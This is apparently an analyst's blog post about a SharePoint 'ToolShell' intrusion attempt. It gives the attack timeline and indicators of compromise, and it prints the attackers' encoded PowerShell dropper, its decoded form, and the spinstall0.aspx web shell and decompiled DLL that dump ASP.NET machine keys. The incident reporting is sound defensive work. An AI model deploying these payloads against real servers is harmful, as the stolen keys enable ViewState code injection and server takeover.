====================
== Alert Overload ==
====================
Tales from a SOC analyst

ToolShell

ToolShell

Jump to updates

Note: This doesn’t add much to the reference article, but covers the events as we saw them.

Reference: SharePoint Under Siege

Starting on July 18th at 8:53:55.224 CDT, the SOC was alerted to serveral detections and blocks of an encoded PowerShell processes executing on a SharePoint front-end server. This server was publicly accessible and not behind the Web Application Firewall (WAF). It was confirmed that direct IP access was allowed. Later investigation revealed the first signs of activity on the affected endpoint occurred on July 17th, at 04:54:50 CDT.

The incident started with a POST request to /_layouts/15/ToolPane.aspx. Unfortunately, the server was not configured to log POST data, only default IIS configured logs. However, this POST request led to the exploitation of w3wp.exe. This application is used to handle requests sent to an IIS server. In this incident, w3wp was abused to launch a cmd process that started the detected PowerShell command.

Attack Chain

There was a logging gap identified for the first detection. The following is built off of the second detection that came in at 09:37:21 CDT.

IIS Log entry The first observed POST request to the affected endpoint.

Timestamp sourceip Command URL Status Code
2025-07-18 09:37:54 CDT 107.191.58.76 POST /_layouts/15/ToolPane.aspx 200

EDR Detection

Encoded PowerShell ```PowerShell powershell -EncodedCommand JABiAGEAcwBlADYANABTAHQAcgBpAG4AZwAgAD0AIAAiAFAAQwBWAEEASQBFAGwAdABjAEcAOQB5AGQAQwBCAE8AWQBXADEAbABjADMAQgBoAFkAMgBVADkASQBsAE4ANQBjADMAUgBsAGIAUwA1AEUAYQBXAEYAbgBiAG0AOQB6AGQARwBsAGoAYwB5AEkAZwBKAFQANABOAEMAagB3AGwAUQBDAEIASgBiAFgAQgB2AGMAbgBRAGcAVABtAEYAdABaAFgATgB3AFkAVwBOAGwAUABTAEoAVABlAFgATgAwAFoAVwAwAHUAUwBVADgAaQBJAEMAVQArAEQAUQBvADgAYwAyAE4AeQBhAFgAQgAwAEkASABKADEAYgBtAEYAMABQAFMASgB6AFoAWABKADIAWgBYAEkAaQBJAEcAeABoAGIAbQBkADEAWQBXAGQAbABQAFMASgBqAEkAeQBJAGcAUQAwADkARQBSAFYAQgBCAFIAMABVADkASQBqAFkAMQBNAEQAQQB4AEkAagA0AE4AQwBpAEEAZwBJAEMAQgB3AGQAVwBKAHMAYQBXAE0AZwBkAG0AOQBwAFoAQwBCAFEAWQBXAGQAbABYADIAeAB2AFkAVwBRAG8ASwBRADAASwBJAEMAQQBnAEkASABzAE4AQwBnAGsASgBkAG0ARgB5AEkASABOADUASQBEADAAZwBVADMAbAB6AGQARwBWAHQATABsAEoAbABaAG0AeABsAFkAMwBSAHAAYgAyADQAdQBRAFgATgB6AFoAVwAxAGkAYgBIAGsAdQBUAEcAOQBoAFoAQwBnAGkAVQAzAGwAegBkAEcAVgB0AEwAbABkAGwAWQBpAHcAZwBWAG0AVgB5AGMAMgBsAHYAYgBqADAAMABMAGoAQQB1AE0AQwA0AHcATABDAEIARABkAFcAeAAwAGQAWABKAGwAUABXADUAbABkAFgAUgB5AFkAVwB3AHMASQBGAEIAMQBZAG0AeABwAFkAMAB0AGwAZQBWAFIAdgBhADIAVgB1AFAAVwBJAHcATQAyAFkAMQBaAGoAZABtAE0AVABGAGsATgBUAEIAaABNADIARQBpAEsAVABzAE4AQwBpAEEAZwBJAEMAQQBnAEkAQwBBAGcAZABtAEYAeQBJAEcAMQByAGQAQwBBADkASQBIAE4ANQBMAGsAZABsAGQARgBSADUAYwBHAFUAbwBJAGwATgA1AGMAMwBSAGwAYgBTADUAWABaAFcASQB1AFEAMgA5AHUAWgBtAGwAbgBkAFgASgBoAGQARwBsAHYAYgBpADUATgBZAFcATgBvAGEAVwA1AGwAUwAyAFYANQBVADIAVgBqAGQARwBsAHYAYgBpAEkAcABPAHcAMABLAEkAQwBBAGcASQBDAEEAZwBJAEMAQgAyAFkAWABJAGcAWgAyAEYAagBJAEQAMABnAGIAVwB0ADAATABrAGQAbABkAEUAMQBsAGQARwBoAHYAWgBDAGcAaQBSADIAVgAwAFEAWABCAHcAYgBHAGwAagBZAFgAUgBwAGIAMgA1AEQAYgAyADUAbQBhAFcAYwBpAEwAQwBCAFQAZQBYAE4AMABaAFcAMAB1AFUAbQBWAG0AYgBHAFYAagBkAEcAbAB2AGIAaQA1AEMAYQBXADUAawBhAFcANQBuAFIAbQB4AGgAWgAzAE0AdQBVADMAUgBoAGQARwBsAGoASQBIAHcAZwBVADMAbAB6AGQARwBWAHQATABsAEoAbABaAG0AeABsAFkAMwBSAHAAYgAyADQAdQBRAG0AbAB1AFoARwBsAHUAWgAwAFoAcwBZAFcAZAB6AEwAawA1AHYAYgBsAEIAMQBZAG0AeABwAFkAeQBrADcARABRAG8AZwBJAEMAQQBnAEkAQwBBAGcASQBIAFoAaABjAGkAQgBqAFoAeQBBADkASQBDAGgAVABlAFgATgAwAFoAVwAwAHUAVgAyAFYAaQBMAGsATgB2AGIAbQBaAHAAWgAzAFYAeQBZAFgAUgBwAGIAMgA0AHUAVABXAEYAagBhAEcAbAB1AFoAVQB0AGwAZQBWAE4AbABZADMAUgBwAGIAMgA0AHAAWgAyAEYAagBMAGsAbAB1AGQAbQA5AHIAWgBTAGgAdQBkAFcAeABzAEwAQwBCAHUAWgBYAGMAZwBiADIASgBxAFoAVwBOADAAVwB6AEIAZABLAFQAcwBOAEMAaQBBAGcASQBDAEEAZwBJAEMAQQBnAFUAbQBWAHoAYwBHADkAdQBjADIAVQB1AFYAMwBKAHAAZABHAFUAbwBZADIAYwB1AFYAbQBGAHMAYQBXAFIAaABkAEcAbAB2AGIAawB0AGwAZQBTAHMAaQBmAEMASQByAFkAMgBjAHUAVgBtAEYAcwBhAFcAUgBoAGQARwBsAHYAYgBpAHMAaQBmAEMASQByAFkAMgBjAHUAUgBHAFYAagBjAG4AbAB3AGQARwBsAHYAYgBrAHQAbABlAFMAcwBpAGYAQwBJAHIAWQAyAGMAdQBSAEcAVgBqAGMAbgBsAHcAZABHAGwAdgBiAGkAcwBpAGYAQwBJAHIAWQAyAGMAdQBRADIAOQB0AGMARwBGADAAYQBXAEoAcABiAEcAbAAwAGUAVQAxAHYAWgBHAFUAcABPAHcAMABLAEkAQwBBAGcASQBIADAATgBDAGoAdwB2AGMAMgBOAHkAYQBYAEIAMABQAGcAPQA9ACIADQAKACQAZABlAHMAdABpAG4AYQB0AGkAbwBuAEYAaQBsAGUAIAA9ACAAIgBDADoAXABQAFIATwBHAFIAQQB+ADEAXABDAE8ATQBNAE8ATgB+ADEAXABNAEkAQwBSAE8AUwB+ADEAXABXAEUAQgBTAEUAUgB+ADEAXAAxADYAXABUAEUATQBQAEwAQQBUAEUAXABMAEEAWQBPAFUAVABTAFwAcwBwAGkAbgBzAHQAYQBsAGwAMAAuAGEAcwBwAHgAIgANAAoAJABkAGUAYwBvAGQAZQBkAEIAeQB0AGUAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAGEAcwBlADYANABTAHQAcgBpAG4AZwApAA0ACgAkAGQAZQBjAG8AZABlAGQAQwBvAG4AdABlAG4AdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGQAZQBjAG8AZABlAGQAQgB5AHQAZQBzACkADQAKACQAZABlAGMAbwBkAGUAZABDAG8AbgB0AGUAbgB0ACAAfAAgAFMAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZABlAHMAdABpAG4AYQB0AGkAbwBuAEYAaQBsAGUAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAdABvAHAA ```

Decoded

powershell  -EncodedCommand $base64String = "PCVAIEltcG9ydCBOYW1lc3BhY2U9IlN5c3RlbS5EaWFnbm9zdGljcyIgJT4NCjwlQCBJbXBvcnQgTmFtZXNwYWNlPSJTeXN0ZW0uSU8iICU+DQo8c2NyaXB0IHJ1bmF0PSJzZXJ2ZXIiIGxhbmd1YWdlPSJjIyIgQ09ERVBBR0U9IjY1MDAxIj4NCiAgICBwdWJsaWMgdm9pZCBQYWdlX2xvYWQoKQ0KICAgIHsNCgkJdmFyIHN5ID0gU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHkuTG9hZCgiU3lzdGVtLldlYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWIwM2Y1ZjdmMTFkNTBhM2EiKTsNCiAgICAgICAgdmFyIG1rdCA9IHN5LkdldFR5cGUoIlN5c3RlbS5XZWIuQ29uZmlndXJhdGlvbi5NYWNoaW5lS2V5U2VjdGlvbiIpOw0KICAgICAgICB2YXIgZ2FjID0gbWt0LkdldE1ldGhvZCgiR2V0QXBwbGljYXRpb25Db25maWciLCBTeXN0ZW0uUmVmbGVjdGlvbi5CaW5kaW5nRmxhZ3MuU3RhdGljIHwgU3lzdGVtLlJlZmxlY3Rpb24uQmluZGluZ0ZsYWdzLk5vblB1YmxpYyk7DQogICAgICAgIHZhciBjZyA9IChTeXN0ZW0uV2ViLkNvbmZpZ3VyYXRpb24uTWFjaGluZUtleVNlY3Rpb24pZ2FjLkludm9rZShudWxsLCBuZXcgb2JqZWN0WzBdKTsNCiAgICAgICAgUmVzcG9uc2UuV3JpdGUoY2cuVmFsaWRhdGlvbktleSsifCIrY2cuVmFsaWRhdGlvbisifCIrY2cuRGVjcnlwdGlvbktleSsifCIrY2cuRGVjcnlwdGlvbisifCIrY2cuQ29tcGF0aWJpbGl0eU1vZGUpOw0KICAgIH0NCjwvc2NyaXB0Pg=="
$destinationFile = "C:\PROGRA~1\COMMON~1\MICROS~1\WEBSER~1\16\TEMPLATE\LAYOUTS\spinstall0.aspx"
$decodedBytes = [System.Convert]::FromBase64String($base64String)
$decodedContent = [System.Text.Encoding]::UTF8.GetString($decodedBytes)
$decodedContent | Set-Content -Path $destinationFile -ErrorAction Stop

This PowerShell code attempts to write the following file to C:\PROGRA~1\COMMON~1\MICROS~1\WEBSER~1\16\TEMPLATE\LAYOUTS\spinstall0.aspx

<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<script runat="server" language="c#" CODEPAGE="65001">
    public void Page_load()
    {
		var sy = System.Reflection.Assembly.Load("System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a");
        var mkt = sy.GetType("System.Web.Configuration.MachineKeySection");
        var gac = mkt.GetMethod("GetApplicationConfig", System.Reflection.BindingFlags.Static | System.Reflection.BindingFlags.NonPublic);
        var cg = (System.Web.Configuration.MachineKeySection)gac.Invoke(null, new object[0]);
        Response.Write(cg.ValidationKey+"|"+cg.Validation+"|"+cg.DecryptionKey+"|"+cg.Decryption+"|"+cg.CompatibilityMode);
    }
</script>

This file would dump cryptographic secrets that could be used in a ViewState code injection attack. See the reference article for more in-depth information on this.

Complete Attack Chain

+--------------------+
|  External Attacker |
+--------------------+
          |
          |  POST request
          |  URL: /_layouts/15/ToolPane.aspx
          |  Time: 2025-07-18 09:37:54 CDT
          |  Source IP: 107.191.58.76
          v
+---------------------+
|    IIS (w3wp.exe)   |
|  Handles the POST   |
+---------------------+
          |
          |  Spawns cmd.exe
          v
+---------------------+
|      cmd.exe        |
|  Executes encoded   |
|   PowerShell blob   |
+---------------------+
          |
          |  Decodes & runs PowerShell
          v
+-----------------------------+
|   powershell.exe (EDR hit) |
|   Writes file:             |
|   C:\...\spinstall0.aspx   |
+-----------------------------+
          |
          |  .aspx file contains:
          |  - C# code to extract:
          |    * ValidationKey
          |    * Validation
          |    * DecryptionKey
          |    * Decryption
          |    * CompatibilityMode
          |
          |  --> Attempt blocked by security controls
          v
+----------------------------------------------+
| If the implant had been successfully         |
| deployed, the keys would be accessible       |
| via a GET request to spinstall0.aspx         |
+----------------------------------------------+

Intel and Monitoring

Currently, the SOC is monitoring the IIS servers for POST requests to the affected endpoint. Monitoring will continue until the servers can be patched and security controls can be implemented.

The SOC has observed POST requests to the affected endpoint from the following addresses:

Source IP First Request Last Request Total Requests
96.9.125.147 2025-07-17 04:54:50 CDT 2025-07-17 07:22:51 CDT 5
107.191.58.76 2025-07-18 09:37:54 CDT 2025-07-18 12:42:53 CDT 5
104.238.159.149 2025-07-18 23:19:50 CDT 2025-07-19 02:3:29 CDT 5

Each request was shortly followed by a GET request for the implant file, with the sole exception being 96.9.125.147. The POST requests on July 17th may have been initial scanning attempts or rudimentary attempts at exploiting the server. No POST data was captured for these events. However, the servers did not log any file creation events during this time, so it is unlikely any exploit attempts were successful.

VirusTotal Threat Graph

The embed doesn’t work :(

VirusTotal Graph

Updates

Updated attacker IPs - 2025-07-21 @ 14:58 CDT

Source Count
45.191.66.77 36
83.136.182.237 15
45.77.155.170 6
104.238.159.149 5
107.191.58.76 5
64.176.50.109 5
96.9.125.147 5
149.40.50.15 4
154.47.29.4 4
185.197.248.131 4
206.166.251.228 4
139.59.11.66 3
154.223.19.106 3
139.162.146.75 1
149.28.124.70 1
185.165.241.220 1

Updated behavior - 2025-07-21 @ 17:19 CDT

Alerted to reflective load of a .Net binary via w3wp. Investigation and decompilation revealed it to be the ToolShell payload (dumping secrets). VirusTotal

Correlated events

Timestamp Event Description
11:10:51 ToolShell POST request IIS log, no data captured. Likely sent payload.
11:10:52 Script scan Content consistent with .Net DLL - Extracted and decompiled to reveal ToolShell payload
11:10:54 Reflective load Loaded into w3wp.exe

Contents of decompilation

// Main, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// Program
using System;
using System.Reflection;
using System.Web;
using System.Web.Configuration;

public class Program
{
	public Program()
	{
		try
		{
			HttpContext current = HttpContext.Current;
			try
			{
				Assembly assembly = Assembly.Load("System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a");
				Type type = assembly.GetType("System.Web.Configuration.MachineKeySection");
				MethodInfo method = type.GetMethod("GetApplicationConfig", BindingFlags.Static | BindingFlags.NonPublic);
				MachineKeySection machineKeySection = (MachineKeySection)method.Invoke(null, new object[0]);
				current.Response.Write(machineKeySection.ValidationKey + "|" + machineKeySection.Validation.ToString() + "|" + machineKeySection.DecryptionKey + "|" + machineKeySection.Decryption + "|" + machineKeySection.CompatibilityMode);
			}
			catch (Exception ex)
			{
				current.Response.Write(ex.Message);
			}
			current.Response.End();
		}
		catch (Exception)
		{
		}
	}

	private static void Main(string[] args)
	{
	}
}

Updated IOCs - 2025-07-21 @ 23:09 CDT

I’ve created a VirusTotal Collection for IOC tracking. This collection has 15 IP addresses observed attempting ToolShell exploits. It also includes the above DLL.

Updated IOCs - 2025-07-22 @ 09:40 CDT

IOCs are still being tracked at VirusTotal Collection

Type Indicator Description
IP Observed Attempting Exploit 104.238.159.149 Observed attempting to deploy spininstall0.aspx
IP Observed Attempting Exploit 107.191.58.76 Observed attempting to deploy spininstall0.aspx
IP Observed Attempting Exploit 139.162.146.75 Observed attempting to deploy spininstall0.aspx
IP Observed Attempting Exploit 139.59.11.66 Observed attempting to deploy spininstall0.aspx
IP Observed Attempting Exploit 149.28.124.70 Deployed .Net DLL
IP Observed Attempting Exploit 149.40.50.15 Observed attempting to deploy spininstall0.aspx
IP Observed Attempting Exploit 154.223.19.106 Observed attempting to deploy spininstall0.aspx
IP Observed Attempting Exploit 154.47.29.4 Observed attempting to deploy spininstall0.aspx
IP Observed Attempting Exploit 185.165.241.220 Observed attempting to deploy spininstall0.aspx
IP Observed Attempting Exploit 206.166.251.228 Observed attempting to deploy spininstall0.aspx
IP Observed Attempting Exploit 45.191.66.77 Deployed .Net DLL
IP Observed Attempting Exploit 45.77.155.170 Observed attempting to deploy spininstall0.aspx
IP Observed Attempting Exploit 64.176.50.109 Observed attempting to deploy spininstall0.aspx
IP Observed Attempting Exploit 83.136.182.237 Observed attempting to deploy spininstall0.aspx
IP Observed Attempting Exploit 96.9.125.147 Observed attempting to deploy spininstall0.aspx
SHA256Hash 7baf220eb89f2a216fcb2d0e9aa021b2a10324f0641caf8b7a9088e4e45bec95 Malicious .Net DLL